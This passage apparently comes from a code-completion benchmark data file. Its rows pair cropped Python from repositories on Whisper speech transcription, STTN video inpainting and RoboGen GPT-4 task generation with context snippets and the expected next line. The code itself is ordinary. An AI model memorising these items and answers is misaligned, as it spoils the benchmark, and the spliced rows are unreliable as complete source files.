# delete the removed row and all the cells associated with it
row.delete()
return row
def get_cell(self, column_name, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
if not self.is_column(column_name):
raise ColumnNotInTable()
try:
cell = CellValue.objects.get(
table=self,
table_column__column_name=column_name,
table_row_id=row_index
)
return cell
except CellValue.DoesNotExist:
raise CellDoesNotExist
def get_column_cells(self, column_name):
if not self.is_column(column_name):
raise ColumnNotInTable()
column = TableColumn.objects.get(table=self, column_name=column_name)
column_cells = column.column_cells.all()
return list(column_cells)
def get_row_cells(self, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
try:
row = TableRow.objects.get(table=self, id=row_index)
row_cells = row.row_cells.all()
except TableRow.DoesNotExist:
raise RowNotInTable()
return list(row_cells)
class TableColumn(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
column_name = models.CharField(max_length=255, unique=True)
column_data_type = models.CharField(max_length=15, choices=__SUPPORTED_DATA_TYPE_CHOICES__)
column_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.column_name}: {self.column_data_type} -- {self.table}"
def _get_column_values(self):
return self.column_cells.all()
class TableRow(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
row_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.table} Table: Row no. {self.id}"
def to_dict(self):
values = {
item.column.column_name: item.value
for item in self.row_cells.all()
}
return values
class CellValue(models.Model):
"""Synonymous with the cell in a spreadsheet, it contains the value of the
table along with relevant information about it position in the table"""
value = models.TextField(blank=True)
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
table_column = models.ForeignKey(TableColumn, on_delete=models.CASCADE)
table_row = models.ForeignKey(TableRow, blank=True, on_delete=models.CASCADE)
def __str__(self):
return self.value
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.full_clean()
super(CellValue, self).save()
def clean(self):
super(CellValue, self).clean()
self.__validate_data_type__(self.value, self.table_column.column_data_type)
def __validate_data_type__(self, value, data_type):
"""
Ensures that the values is saved in the database in the format that
can be easily be converted to the desired data type
"""
if data_type == 'char' or data_type == 'textfield':
self.value = str(value)
elif data_type == 'int':
if not isinstance(value, int):
try:
if value:
self.value = int(float(value))
else:
self.value = ""
except ValueError:
| raise CantParseValueToDataType(f"{value} to {data_type}")
| 7 | 2023-12-19 15:50:38+00:00 | 4k |
mohame54/Speech-Transcriber-App | whisper/whisper.py | [
{
"identifier": "Inference",
"path": "whisper/decoding.py",
"snippet": "class Inference:\n \"\"\"\n Class for handling sequence generation inference.\n\n Attributes:\n encoder: ONNX runtime inference session for the encoder.\n decoder: ONNX runtime inference session for the decoder.\n _mode: Language mode (\"English\" or \"Arabic\").\n \"\"\"\n def __init__(\n self,\n encoder_path: str,\n decoder_path: str,\n mode: Optional[str] = \"English\"\n ):\n \"\"\"\n Initializes the Inference instance.\n\n Parameters:\n encoder_path: Path to the encoder model.\n decoder_path: Path to the decoder model.\n mode: Language mode (\"English\" or \"Arabic\").\n \"\"\"\n options = onnxruntime.SessionOptions()\n providers = [\"CPUExecutionProvider\"]\n options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL\n self.encoder = onnxruntime.InferenceSession(\n encoder_path, sess_options=options, providers=providers)\n self.decoder = onnxruntime.InferenceSession(\n decoder_path, sess_options=options, providers=providers)\n self._mode = mode\n self.reset()\n \n def reset(self):\n self.cross_k_cache = None\n self.cross_v_cache = None\n\n def encode(self, feats):\n _, cross_k_cache, cross_v_cache = self.encoder.run(None, {\"mel\":feats}) \n self.cross_k_cache = cross_k_cache\n self.cross_v_cache = cross_v_cache\n\n def get_inits(self):\n lang_id = ENGLISH_ID if self._mode == \"English\" else ARABIC_ID\n k_caches = np.zeros((6, 1, 8, 1, 64)).astype(np.float32)\n v_caches = np.zeros((6, 1, 8, 1, 64)).astype(np.float32)\n tokens = [50258, lang_id, 50359, 50363]\n hyp: Hypothesis = Hypothesis(\n tokens,\n k_caches,\n v_caches,\n )\n return hyp \n\n def set_mode(self, mode: str):\n self._mode = mode \n\n def __call__(\n self,\n hyp: Hypothesis,\n initial: Optional[bool] = False,\n ) -> Tuple[np.ndarray]:\n \"\"\"\n Generates logits for the given hypothesis using the encoder and decoder.\n\n Parameters:\n hyp: The hypothesis.\n initial: Whether it's the initial generation or not.\n\n Returns:\n np.ndarray: Logits for the hypothesis.\n np.ndarray: keys caches for inference.\n np.ndarray: values caches for inference.\n \"\"\"\n if initial:\n tokens = np.array(hyp.tokens)\n else:\n tokens = np.array([hyp.tokens[-1]]) \n tokens = np.expand_dims(tokens, axis=0).astype(np.int32)\n ort_inputs = {\n \"tokens\":tokens,\n \"self_k_caches\":hyp.k_caches,\n \"self_v_caches\":hyp.v_caches,\n \"cross_k_caches\":self.cross_k_cache,\n \"cross_v_caches\":self.cross_v_cache,\n } \n outs = self.decoder.run(None, ort_inputs) \n # update the internal variables\n # update the k an v states \n k_caches = outs[1] \n v_caches = outs[2]\n return (outs[0][:, -1: ,:]).squeeze(), k_caches, v_caches "
},
{
"identifier": "GreedyDecoding",
"path": "whisper/decoding.py",
"snippet": "class GreedyDecoding(Decoding):\n \"\"\"\n Greedy decoding strategy for sequence generation.\n\n Attributes:\n inference: The inference instance.\n eos_id: End-of-sequence token ID.\n temperature: Temperature parameter for softmax.\n top_p: Top-p sampling parameter.\n \"\"\"\n\n def __init__(\n self,\n inference,\n eos_id,\n temperature=0.9,\n top_p=0.95\n ):\n \"\"\"\n Initializes the GreedyDecoding instance.\n\n Parameters:\n inference: The inference instance.\n eos_id: End-of-sequence token ID.\n temperature (float): Temperature parameter for softmax.\n top_p (float): Top-p sampling parameter.\n \"\"\"\n super().__init__(inference)\n self.eos_id = eos_id\n self.temperature = temperature\n self.top_p = top_p\n\n def update(self, logits: np.ndarray, hyp: Hypothesis):\n \"\"\"\n Updates a hypothesis based on logits using the greedy decoding strategy.\n\n Parameters:\n logits: The logits from the model.\n hyp: The hypothesis.\n\n Returns:\n Hypothesis: Updated hypothesis.\n \"\"\"\n logits = logits.reshape(-1,)\n if self.temperature == 0 or self.temperature == 1.0:\n next_token = logits.argmax(axis=-1)\n else:\n probs = softmax(logits / self.temperature)\n next_token = sample_top_p(probs, self.top_p)\n logprobs = log_softmax(logits)[next_token]\n hyp.logprob += logprobs\n if next_token == self.eos_id:\n hyp.is_done = True\n hyp.tokens.append(next_token)\n return hyp\n\n def __call__(\n self,\n audio_feats:np.ndarray,\n max_len:int=50,\n return_multiple:bool=False\n ) -> List[Hypothesis]:\n \"\"\"\n Performs greedy decoding on audio features.\n\n Parameters:\n audio_feats (numpy array): Audio features.\n max_len (int): Maximum length of the generated sequence.\n return_multiple (bool): Whether to return multiple hypotheses or the best one.\n\n Returns:\n Hypothesis: Generated hypothesis.\n \"\"\"\n self.reset()\n self.inference.encode(audio_feats)\n hyp: Hypothesis = self.inference.get_inits()\n for i in range(1, max_len):\n is_initial = i == 1\n # Retrive the current logits and k_caches and v_caches\n logits, k_cahces, v_caches = self.inference(hyp, initial=is_initial)\n # Update the Hypothesis k_cahces, v_caches \n hyp.k_caches = k_cahces\n hyp.v_caches = v_caches\n hyp = self.update(logits, hyp)\n if hyp.is_done:\n break\n # Release keys and values caches. \n hyp.k_caches = None\n hyp.v_caches = None \n return hyp"
},
{
"identifier": "BeamSearchDecoding",
"path": "whisper/decoding.py",
"snippet": "class BeamSearchDecoding(Decoding):\n \"\"\"\n Beam search decoding strategy for sequence generation.\n\n Attributes:\n inference: The inference instance.\n eos_id: End-of-sequence token ID.\n beam_size: Size of the beam.\n length_penalty: Length penalty factor.\n \"\"\"\n\n def __init__(\n self,\n inference,\n eos_id: int,\n beam_size: int = 3,\n length_penalty: float = 1,\n top_p=0.95,\n temperature=1.0,\n ):\n \"\"\"\n Initializes the BeamSearchDecoding instance.\n\n Parameters:\n inference: The inference instance.\n eos_id (int): End-of-sequence token ID.\n beam_size (int): Size of the beam.\n length_penalty (float): Length penalty factor.\n \"\"\"\n super().__init__(inference)\n self.eos_id = eos_id\n self.beam_size = beam_size\n self.length_penalty = MaximumLikelihoodRanker(length_penalty)\n self.temperature = temperature\n self.top_p = top_p\n\n def update(\n self,\n hyps: List[Hypothesis],\n initial: bool = False,\n ):\n \"\"\"\n Updates hypotheses based on logits using the beam search strategy.\n\n Parameters:\n hyps: List of hypotheses.\n initial: Whether it's the initial hyp or not.\n\n Returns:\n List[Hypothesis]: Updated hypotheses.\n \"\"\"\n new_beam = []\n\n for hyp in hyps:\n if hyp.is_done:\n # If the hypothesis is already completed, keep it in the beam\n new_beam.append(hyp)\n continue\n\n # Get logits for the current hypothesis\n logits, k_caches, v_caches = self.inference(hyp, initial=initial)\n # Apply greedy decode or top p sampling to get the top beam_width candidates\n if self.temperature > 0.0 and self.temperature != 1.0:\n probs = softmax(logits / self.temperature)\n top_indices = sample_top_p(probs, self.top_p, size=self.beam_size)\n else:\n top_indices = np.argsort(logits)[::-1][:self.beam_size] \n # Apply log softmax normalize then calculate \n logits = logits - logits.max(axis=-1) \n sum_logits = np.log(np.sum(np.exp(logits)))\n for idx in top_indices:\n # Create a new hypothesis by extending the current one\n new_tokens = hyp.tokens + [idx]\n #Calculate the log probability\n new_logprob = hyp.logprob + (logits[idx] - sum_logits)\n new_is_done = (idx == self.eos_id)\n # Add the new hypothesis to the beam\n new_beam.append(\n Hypothesis(\n tokens=new_tokens,\n k_caches=k_caches,\n v_caches=v_caches,\n logprob=new_logprob,\n is_done=new_is_done\n )\n )\n\n # Sort the beam based on log probabilities\n new_beam = sorted(new_beam, key=lambda h: h.logprob, reverse=True)\n return new_beam[:self.beam_size]\n\n def __call__(\n self,\n audio_feats: np.ndarray,\n max_len: int = 50,\n return_multiple: bool=False\n ) -> List[Hypothesis]:\n \"\"\"\n Performs beam search decoding on audio features.\n\n Parameters:\n audio_feats (numpy array): Audio features.\n max_len (int): Maximum length of the generated sequence.\n return_multiple (bool): Whether to return multiple hypotheses or the best one.\n\n Returns:\n Hypothesis or List[Hypothesis]: Generated hypothesis or hypotheses.\n \"\"\"\n self.reset()\n self.inference.encode(audio_feats)\n beam: List[Hypothesis] = [self.inference.get_inits()]\n for i in range(1, max_len):\n is_initial = i == 1\n beam = self.update(\n beam,\n initial=is_initial\n )\n if any(h.is_done for h in beam):\n break\n beam = self.finalize(beam)\n if not return_multiple:\n best_idx = self.length_penalty.rank(beam)\n beam = beam[best_idx]\n return beam\n \n def finalize(self, hyps: List[Hypothesis]):\n \"\"\"\n Finalizes the decoding process by appending end-of-sequence tokens to hypotheses.\n\n Parameters:\n hyps: List of hypotheses.\n\n Returns:\n List[Hypothesis]: Finalized hypotheses.\n \"\"\"\n for i in range(len(hyps)):\n hyps[i].k_caches = None\n hyps[i].v_caches = None\n if hyps[i].tokens[-1] != self.eos_id:\n hyps[i].tokens.append(self.eos_id)\n return hyps"
},
{
"identifier": "Hypothesis",
"path": "whisper/decoding.py",
"snippet": "class Hypothesis:\n \"\"\"\n Represents a hypothesis in sequence generation.\n\n Attributes:\n tokens (List[int]): List of tokens in the hypothesis.\n k_caches (np.ndarray): key caches for inference.\n v_caches (np.ndarray): value caches for inference.\n logprob (float): Log probability of the hypothesis.\n is_done (bool): Indicates whether the hypothesis is complete.\n \"\"\"\n tokens: List[int]\n k_caches: Optional[np.ndarray] = None\n v_caches: Optional[np.ndarray] = None\n logprob: float = 0.0\n is_done: bool = False"
}
] | from typing import Literal, Union, Tuple, Optional, List
from transformers import WhisperFeatureExtractor, WhisperTokenizer
from dataclasses import dataclass
from .decoding import Inference, GreedyDecoding, BeamSearchDecoding, Hypothesis
import soxr
import soundfile as sf
import numpy as np
import wget
import os | 3,532 |
# LOCAL
@dataclass
class WhisperConfig:
"""
Configuration class for the WhisperInference module.
Attributes:
- encoder_path: Path to the encoder model.
- decoder_path: Path to the decoder model.
- model_id: Model identifier, default is "openai/whisper-base" this is the only one supported for now.
- transcribption_mode: Language mode, default is "English".
- decoding: Decoding mode, default is "greedy".
- beam_size: Beam size for beam search decoding, default is 5.
- eos_id: End-of-sequence token ID, default is 50257.
- temperature: Temperature for decoding, default is 1.0.
- top_p: Top-p sampling parameter, default is 0.98.
- length_penalty: Length penalty for beam search decoding, default is 2.0.
"""
encoder_path: str
decoder_path: str
model_id: str = "openai/whisper-base"
transcribption_mode: Literal["English", "Arabic"] = "English"
decoding: Literal["greedy", "beam"] = "greedy"
beam_size: int = 5
eos_id: int = 50257
temperature: float = 1.0
top_p: float = 0.98
length_penalty: float = 2.0
class WhisperInference:
"""
Inference module for transcribing audio using the Whisper model.
Attributes:
- processor: WhisperFeatureExtractor for extracting features from audio.
- tokenizer: WhisperTokenizer for tokenizing transcriptions.
- decoding: Decoding strategy based on the selected mode.
"""
def __init__(
self,
config: WhisperConfig
):
"""
Initializes the WhisperInference module.
Args:
- config: WhisperConfig object containing model configuration.
"""
# Initialize feature extractor and tokenizer
self.processor = WhisperFeatureExtractor.from_pretrained(config.model_id)
self.tokenizer = WhisperTokenizer.from_pretrained(
config.model_id,
language=config.transcribption_mode,
task="transcribe",
)
self.config = config
self.inference = Inference(
self.config.encoder_path,
self.config.decoder_path,
self.config.transcribption_mode,
)
self.set_decoding()
def set_decoding(self, decoding: Optional[str]= None):
# Initialize inference and decoding strategy based on the selected mode
decoding = decoding if decoding is not None else self.config.decoding
if decoding == "greedy":
|
# LOCAL
@dataclass
class WhisperConfig:
"""
Configuration class for the WhisperInference module.
Attributes:
- encoder_path: Path to the encoder model.
- decoder_path: Path to the decoder model.
- model_id: Model identifier, default is "openai/whisper-base" this is the only one supported for now.
- transcribption_mode: Language mode, default is "English".
- decoding: Decoding mode, default is "greedy".
- beam_size: Beam size for beam search decoding, default is 5.
- eos_id: End-of-sequence token ID, default is 50257.
- temperature: Temperature for decoding, default is 1.0.
- top_p: Top-p sampling parameter, default is 0.98.
- length_penalty: Length penalty for beam search decoding, default is 2.0.
"""
encoder_path: str
decoder_path: str
model_id: str = "openai/whisper-base"
transcribption_mode: Literal["English", "Arabic"] = "English"
decoding: Literal["greedy", "beam"] = "greedy"
beam_size: int = 5
eos_id: int = 50257
temperature: float = 1.0
top_p: float = 0.98
length_penalty: float = 2.0
class WhisperInference:
"""
Inference module for transcribing audio using the Whisper model.
Attributes:
- processor: WhisperFeatureExtractor for extracting features from audio.
- tokenizer: WhisperTokenizer for tokenizing transcriptions.
- decoding: Decoding strategy based on the selected mode.
"""
def __init__(
self,
config: WhisperConfig
):
"""
Initializes the WhisperInference module.
Args:
- config: WhisperConfig object containing model configuration.
"""
# Initialize feature extractor and tokenizer
self.processor = WhisperFeatureExtractor.from_pretrained(config.model_id)
self.tokenizer = WhisperTokenizer.from_pretrained(
config.model_id,
language=config.transcribption_mode,
task="transcribe",
)
self.config = config
self.inference = Inference(
self.config.encoder_path,
self.config.decoder_path,
self.config.transcribption_mode,
)
self.set_decoding()
def set_decoding(self, decoding: Optional[str]= None):
# Initialize inference and decoding strategy based on the selected mode
decoding = decoding if decoding is not None else self.config.decoding
if decoding == "greedy": | self.decoding = GreedyDecoding( | 1 | 2023-12-16 13:35:51+00:00 | 4k |
YaoFANGUK/video-subtitle-remover | backend/tools/train/dataset_sttn.py | [
{
"identifier": "ZipReader",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "class ZipReader(object):\n file_dict = dict()\n\n def __init__(self):\n super(ZipReader, self).__init__()\n\n @staticmethod\n def build_file_dict(path):\n file_dict = ZipReader.file_dict\n if path in file_dict:\n return file_dict[path]\n else:\n file_handle = zipfile.ZipFile(path, 'r')\n file_dict[path] = file_handle\n return file_dict[path]\n\n @staticmethod\n def imread(path, image_name):\n zfile = ZipReader.build_file_dict(path)\n data = zfile.read(image_name)\n im = Image.open(io.BytesIO(data))\n return im"
},
{
"identifier": "create_random_shape_with_random_motion",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "def create_random_shape_with_random_motion(video_length, imageHeight=240, imageWidth=432):\n # get a random shape\n height = random.randint(imageHeight//3, imageHeight-1)\n width = random.randint(imageWidth//3, imageWidth-1)\n edge_num = random.randint(6, 8)\n ratio = random.randint(6, 8)/10\n region = get_random_shape(\n edge_num=edge_num, ratio=ratio, height=height, width=width)\n region_width, region_height = region.size\n # get random position\n x, y = random.randint(\n 0, imageHeight-region_height), random.randint(0, imageWidth-region_width)\n velocity = get_random_velocity(max_speed=3)\n m = Image.fromarray(np.zeros((imageHeight, imageWidth)).astype(np.uint8))\n m.paste(region, (y, x, y+region.size[0], x+region.size[1]))\n masks = [m.convert('L')]\n # return fixed masks\n if random.uniform(0, 1) > 0.5:\n return masks*video_length\n # return moving masks\n for _ in range(video_length-1):\n x, y, velocity = random_move_control_points(\n x, y, imageHeight, imageWidth, velocity, region.size, maxLineAcceleration=(3, 0.5), maxInitSpeed=3)\n m = Image.fromarray(\n np.zeros((imageHeight, imageWidth)).astype(np.uint8))\n m.paste(region, (y, x, y+region.size[0], x+region.size[1]))\n masks.append(m.convert('L'))\n return masks"
},
{
"identifier": "Stack",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "class Stack(object):\n def __init__(self, roll=False):\n self.roll = roll\n\n def __call__(self, img_group):\n mode = img_group[0].mode\n if mode == '1':\n img_group = [img.convert('L') for img in img_group]\n mode = 'L'\n if mode == 'L':\n return np.stack([np.expand_dims(x, 2) for x in img_group], axis=2)\n elif mode == 'RGB':\n if self.roll:\n return np.stack([np.array(x)[:, :, ::-1] for x in img_group], axis=2)\n else:\n return np.stack(img_group, axis=2)\n else:\n raise NotImplementedError(f\"Image mode {mode}\")"
},
{
"identifier": "ToTorchFormatTensor",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "class ToTorchFormatTensor(object):\n \"\"\" Converts a PIL.Image (RGB) or numpy.ndarray (H x W x C) in the range [0, 255]\n to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0] \"\"\"\n\n def __init__(self, div=True):\n self.div = div\n\n def __call__(self, pic):\n if isinstance(pic, np.ndarray):\n # numpy img: [L, C, H, W]\n img = torch.from_numpy(pic).permute(2, 3, 0, 1).contiguous()\n else:\n # handle PIL Image\n img = torch.ByteTensor(\n torch.ByteStorage.from_buffer(pic.tobytes()))\n img = img.view(pic.size[1], pic.size[0], len(pic.mode))\n # put it from HWC to CHW format\n # yikes, this transpose takes 80% of the loading time/CPU\n img = img.transpose(0, 1).transpose(0, 2).contiguous()\n img = img.float().div(255) if self.div else img.float()\n return img"
},
{
"identifier": "GroupRandomHorizontalFlip",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "class GroupRandomHorizontalFlip(object):\n \"\"\"Randomly horizontally flips the given PIL.Image with a probability of 0.5\n \"\"\"\n\n def __init__(self, is_flow=False):\n self.is_flow = is_flow\n\n def __call__(self, img_group, is_flow=False):\n v = random.random()\n if v < 0.5:\n ret = [img.transpose(Image.FLIP_LEFT_RIGHT) for img in img_group]\n if self.is_flow:\n for i in range(0, len(ret), 2):\n # invert flow pixel values when flipping\n ret[i] = ImageOps.invert(ret[i])\n return ret\n else:\n return img_group"
}
] | import os
import json
import random
import torch
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from backend.tools.train.utils_sttn import ZipReader, create_random_shape_with_random_motion
from backend.tools.train.utils_sttn import Stack, ToTorchFormatTensor, GroupRandomHorizontalFlip | 1,934 |
# 自定义的数据集
class Dataset(torch.utils.data.Dataset):
def __init__(self, args: dict, split='train', debug=False):
# 初始化函数,传入配置参数字典,数据集划分类型,默认为'train'
self.args = args
self.split = split
self.sample_length = args['sample_length'] # 样本长度参数
self.size = self.w, self.h = (args['w'], args['h']) # 设置图像的目标宽高
# 打开存放数据相关信息的json文件
with open(os.path.join(args['data_root'], args['name'], split+'.json'), 'r') as f:
self.video_dict = json.load(f) # 加载json文件内容
self.video_names = list(self.video_dict.keys()) # 获取视频的名称列表
if debug or split != 'train': # 如果是调试模式或者不是训练集,只取前100个视频
self.video_names = self.video_names[:100]
# 定义数据的转换操作,转换成堆叠的张量
self._to_tensors = transforms.Compose([
Stack(),
ToTorchFormatTensor(), # 便于在PyTorch中使用的张量格式
])
def __len__(self):
# 返回数据集中视频的数量
return len(self.video_names)
def __getitem__(self, index):
# 获取一个样本项
try:
item = self.load_item(index) # 尝试加载指定索引的数据项
except:
print('Loading error in video {}'.format(self.video_names[index])) # 如果加载出错,打印出错信息
item = self.load_item(0) # 加载第一个项目作为兜底
return item
def load_item(self, index):
# 加载数据项的具体实现
video_name = self.video_names[index] # 根据索引获取视频名称
# 为所有视频帧生成帧文件名列表
all_frames = [f"{str(i).zfill(5)}.jpg" for i in range(self.video_dict[video_name])]
# 生成随机运动的随机形状的遮罩
all_masks = create_random_shape_with_random_motion(
len(all_frames), imageHeight=self.h, imageWidth=self.w)
# 获取参考帧的索引
ref_index = get_ref_index(len(all_frames), self.sample_length)
# 读取视频帧
frames = []
masks = []
for idx in ref_index:
# 读取图片,转化为RGB,调整大小并添加到列表中
|
# 自定义的数据集
class Dataset(torch.utils.data.Dataset):
def __init__(self, args: dict, split='train', debug=False):
# 初始化函数,传入配置参数字典,数据集划分类型,默认为'train'
self.args = args
self.split = split
self.sample_length = args['sample_length'] # 样本长度参数
self.size = self.w, self.h = (args['w'], args['h']) # 设置图像的目标宽高
# 打开存放数据相关信息的json文件
with open(os.path.join(args['data_root'], args['name'], split+'.json'), 'r') as f:
self.video_dict = json.load(f) # 加载json文件内容
self.video_names = list(self.video_dict.keys()) # 获取视频的名称列表
if debug or split != 'train': # 如果是调试模式或者不是训练集,只取前100个视频
self.video_names = self.video_names[:100]
# 定义数据的转换操作,转换成堆叠的张量
self._to_tensors = transforms.Compose([
Stack(),
ToTorchFormatTensor(), # 便于在PyTorch中使用的张量格式
])
def __len__(self):
# 返回数据集中视频的数量
return len(self.video_names)
def __getitem__(self, index):
# 获取一个样本项
try:
item = self.load_item(index) # 尝试加载指定索引的数据项
except:
print('Loading error in video {}'.format(self.video_names[index])) # 如果加载出错,打印出错信息
item = self.load_item(0) # 加载第一个项目作为兜底
return item
def load_item(self, index):
# 加载数据项的具体实现
video_name = self.video_names[index] # 根据索引获取视频名称
# 为所有视频帧生成帧文件名列表
all_frames = [f"{str(i).zfill(5)}.jpg" for i in range(self.video_dict[video_name])]
# 生成随机运动的随机形状的遮罩
all_masks = create_random_shape_with_random_motion(
len(all_frames), imageHeight=self.h, imageWidth=self.w)
# 获取参考帧的索引
ref_index = get_ref_index(len(all_frames), self.sample_length)
# 读取视频帧
frames = []
masks = []
for idx in ref_index:
# 读取图片,转化为RGB,调整大小并添加到列表中 | img = ZipReader.imread('{}/{}/JPEGImages/{}.zip'.format( | 0 | 2023-10-25 02:50:01+00:00 | 4k |
Genesis-Embodied-AI/RoboGen | gpt_4/prompts/prompt_manipulation.py | [
{
"identifier": "partnet_mobility_dict",
"path": "objaverse_utils/utils.py",
"snippet": ""
},
{
"identifier": "build_task_given_text",
"path": "gpt_4/prompts/utils.py",
"snippet": "def build_task_given_text(object_category, task_name, task_description, additional_object, involved_links, involved_joints, \n articulation_tree_filled, semantics_filled, object_path, save_folder, temperature_dict, model_dict=None):\n if model_dict is None:\n model_dict = {\n \"task_generation\": \"gpt-4\",\n \"reward\": \"gpt-4\",\n \"yaml\": \"gpt-4\",\n \"size\": \"gpt-4\",\n \"joint\": \"gpt-4\",\n \"spatial_relationship\": \"gpt-4\"\n }\n\n task_yaml_config_prompt_filled = copy.deepcopy(task_yaml_config_prompt)\n if additional_object.lower() == \"none\":\n task_object = object_category\n else:\n task_object = \"{}, {}\".format(object_category, additional_object)\n task_yaml_config_prompt_filled = task_yaml_config_prompt_filled.format(task_name, task_description, task_object)\n task_yaml_config_prompt_filled += articulation_tree_filled + semantics_filled\n\n system = \"You are a helpful assistant.\"\n save_path = os.path.join(save_folder, \"gpt_response/task_yaml_config_{}.json\".format(task_name))\n print(\"=\" * 50)\n print(\"=\" * 20, \"generating task yaml config\", \"=\" * 20)\n print(\"=\" * 50)\n task_yaml_response = query(system, [task_yaml_config_prompt_filled], [], save_path=save_path, debug=False, \n temperature=temperature_dict[\"yaml\"], model=model_dict[\"yaml\"])\n # NOTE: parse the yaml file and generate the task in the simulator.\n description = f\"{task_name}_{task_description}\".replace(\" \", \"_\").replace(\".\", \"\").replace(\",\", \"\")\n task_yaml_response = task_yaml_response.split(\"\\n\")\n size_save_path = os.path.join(save_folder, \"gpt_response/size_{}.json\".format(task_name))\n parsed_yaml, save_name = parse_response_to_get_yaml(task_yaml_response, description, save_path=size_save_path, \n temperature=temperature_dict[\"size\"], model=model_dict[\"size\"])\n\n # NOTE: post-process such that articulated object is urdf.\n # NOTE: post-process to include the reward asset path for reward generation. \n for obj in parsed_yaml:\n if \"name\" in obj and obj['name'] == object_category:\n obj['type'] = 'urdf'\n obj['reward_asset_path'] = object_path\n\n # config_path = \"gpt_4/data/parsed_configs_semantic_articulated/{}-{}\".format(object_category, time_string)\n config_path = save_folder\n with open(os.path.join(config_path, save_name), 'w') as f:\n yaml.dump(parsed_yaml, f, indent=4)\n\n input_to_reward_config = copy.deepcopy(parsed_yaml)\n for obj in input_to_reward_config:\n if \"reward_asset_path\" in obj:\n input_to_reward_config.remove(obj)\n initial_config = yaml.safe_dump(parsed_yaml)\n\n ### decompose and generate reward\n yaml_file_path = os.path.join(config_path, save_name)\n reward_save_path = os.path.join(save_folder, \"gpt_response/reward_{}.json\".format(task_name))\n print(\"=\" * 50)\n print(\"=\" * 20, \"generating reward\", \"=\" * 20)\n print(\"=\" * 50)\n solution_path = decompose_and_generate_reward_or_primitive(task_name, task_description, initial_config, \n articulation_tree_filled, semantics_filled, \n involved_links, involved_joints, object_path, \n yaml_file_path, save_path=reward_save_path,\n temperature=temperature_dict[\"reward\"],\n model=model_dict[\"reward\"])\n \n\n ### generate joint angle\n save_path = os.path.join(save_folder, \"gpt_response/joint_angle_{}.json\".format(task_name))\n substep_file_path = os.path.join(solution_path, \"substeps.txt\")\n with open(substep_file_path, 'r') as f:\n substeps = f.readlines()\n print(\"=\" * 50)\n print(\"=\" * 20, \"generating initial joint angle\", \"=\" * 20)\n print(\"=\" * 50)\n joint_angle_values = query_joint_angle(task_name, task_description, articulation_tree_filled, semantics_filled, \n involved_links, involved_joints, substeps, save_path=save_path, \n temperature=temperature_dict['joint'], model=model_dict[\"joint\"])\n joint_angle_values[\"set_joint_angle_object_name\"] = object_category\n\n involved_objects = []\n config = yaml.safe_load(initial_config)\n for obj in config:\n if \"name\" in obj:\n involved_objects.append(obj[\"name\"])\n involved_objects = \", \".join(involved_objects)\n save_path = os.path.join(save_folder, \"gpt_response/spatial_relationships_{}.json\".format(task_name))\n print(\"=\" * 50)\n print(\"=\" * 20, \"generating initial spatial relationship\", \"=\" * 20)\n print(\"=\" * 50)\n spatial_relationships = query_spatial_relationship(task_name, task_description, involved_objects, articulation_tree_filled, semantics_filled, \n involved_links, involved_joints, substeps, save_path=save_path, \n temperature=temperature_dict['spatial_relationship'], model=model_dict[\"spatial_relationship\"])\n\n config.append(dict(solution_path=solution_path))\n config.append(joint_angle_values)\n config.append(dict(spatial_relationships=spatial_relationships))\n config.append(dict(task_name=task_name, task_description=task_description))\n with open(os.path.join(config_path, save_name), 'w') as f:\n yaml.dump(config, f, indent=4)\n with open(os.path.join(solution_path, \"config.yaml\"), 'w') as f:\n yaml.dump(config, f, indent=4)\n\n return os.path.join(config_path, save_name)"
},
{
"identifier": "parse_task_response",
"path": "gpt_4/prompts/utils.py",
"snippet": "def parse_task_response(task_response):\n task_names = []\n task_descriptions = []\n additional_objects = []\n links = []\n joints = []\n\n task_response = task_response.split(\"\\n\")\n for l_idx, line in enumerate(task_response):\n if line.lower().startswith(\"task name:\"):\n task_name = line.split(\":\")[1].strip()\n task_name = task_name.replace(\"/\", \" or \").replace(\".\", \"\").replace(\"'\", \"\").replace('\"', \"\")\n task_names.append(task_name)\n task_description = task_response[l_idx+1].split(\":\")[1].strip()\n task_description = task_description.replace(\"/\", \" or \").replace(\".\", \"\").replace(\"'\", \"\").replace('\"', \"\").replace(\")\", \".\").replace(\"(\", \".\")\n task_descriptions.append(task_description)\n additional_objects.append(task_response[l_idx+2].split(\":\")[1].strip())\n involved_links = \"\"\n for link_idx in range(l_idx+4, len(task_response)):\n if task_response[link_idx].lower().startswith(\"joints:\"):\n break\n else:\n # involved_links.append(task_response[link_idx].split(\":\")[0][2:])\n involved_links += (task_response[link_idx][2:])\n links.append(involved_links)\n involved_joints = \"\"\n for joint_idx in range(link_idx+1, len(task_response)):\n if not task_response[joint_idx].lower().startswith(\"- \"):\n break\n else:\n # involved_joints.append(task_response[joint_idx].split(\":\")[0][2:])\n involved_joints += (task_response[joint_idx][2:])\n joints.append(involved_joints)\n\n return task_names, task_descriptions, additional_objects, links, joints"
},
{
"identifier": "query",
"path": "gpt_4/query.py",
"snippet": "def query(system, user_contents, assistant_contents, model='gpt-4', save_path=None, temperature=1, debug=False):\n \n for user_content, assistant_content in zip(user_contents, assistant_contents):\n user_content = user_content.split(\"\\n\")\n assistant_content = assistant_content.split(\"\\n\")\n \n for u in user_content:\n print(u)\n print(\"=====================================\")\n for a in assistant_content:\n print(a)\n print(\"=====================================\")\n\n for u in user_contents[-1].split(\"\\n\"):\n print(u)\n\n if debug:\n import pdb; pdb.set_trace()\n return None\n\n print(\"=====================================\")\n\n start = time.time()\n \n num_assistant_mes = len(assistant_contents)\n messages = []\n\n messages.append({\"role\": \"system\", \"content\": \"{}\".format(system)})\n for idx in range(num_assistant_mes):\n messages.append({\"role\": \"user\", \"content\": user_contents[idx]})\n messages.append({\"role\": \"assistant\", \"content\": assistant_contents[idx]})\n messages.append({\"role\": \"user\", \"content\": 